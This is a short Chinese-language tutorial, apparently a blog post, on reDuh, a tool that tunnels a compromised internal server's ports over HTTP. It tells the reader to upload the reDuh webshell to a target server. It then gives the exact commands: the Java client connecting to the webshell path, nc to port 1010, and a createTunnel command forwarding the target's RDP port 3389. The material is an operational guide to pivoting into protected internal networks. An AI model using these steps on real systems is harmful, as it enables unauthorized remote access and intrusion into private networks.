国外大牛的作品,偶顺手写了个使用说明。E文好的看原文  http://www.sensepost.com/research/reDuh/

这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。

本机——-客户端———(http隧道)———–服务端——————内网服务器

服务端是个webshell(针对不同服务器有aspx,php,jsp三个版本),客户端是java写的,本机执行最好装上JDK。

把客户端文件解包,这里我把它放到E盘的TEST文件夹

内网渗透利器–reDuh(webshell跳板)简单使用说明_内网

图01

把服务端的webshell上传到目标服务器

 

内网渗透利器–reDuh(webshell跳板)简单使用说明_内网_02

图02

目标服务器在内网,开了终端服务。

 

内网渗透利器–reDuh(webshell跳板)简单使用说明_服务器_03

图03

命令行下用客户端连接服务端

E:\test>java reDuhClient 目标服务器域名 http 80 /WEBSHELL路径/reDuh.aspx

内网渗透利器–reDuh(webshell跳板)简单使用说明_内网_04

图04

新开一个命令行,用NC连接本机1010端口。

H:\>nc -vv localhost 1010

内网渗透利器–reDuh(webshell跳板)简单使用说明_服务端_05

图05

连接成功会有欢迎提示,之后输入命令

>>[createTunnel]1234:127.0.0.1:3389

前面的1234是本机连接用的端口,中间的ip地址是目标服务器的(可以是webshell所在服务器也可以是和它同内网的服务器),后面的3389是欲连接目标服务器的端口。

成功后两个命令行窗口都会有成功提示。

内网渗透利器–reDuh(webshell跳板)简单使用说明_服务器_06

图06

内网渗透利器–reDuh(webshell跳板)简单使用说明_内网_07

图07

这时通道已经建立,你连接本机的1234端口就相当于连接到目标服务器的3389端口了。

内网渗透利器–reDuh(webshell跳板)简单使用说明_内网_08

内网渗透利器–reDuh(webshell跳板)简单使用说明_服务端_09

 

数据的传递过程

内网渗透利器–reDuh(webshell跳板)简单使用说明_内网_10

图10

需要注意的是用此工具转发数据速度很慢,连接的时候应尽量把mstsc的颜色设置调低些。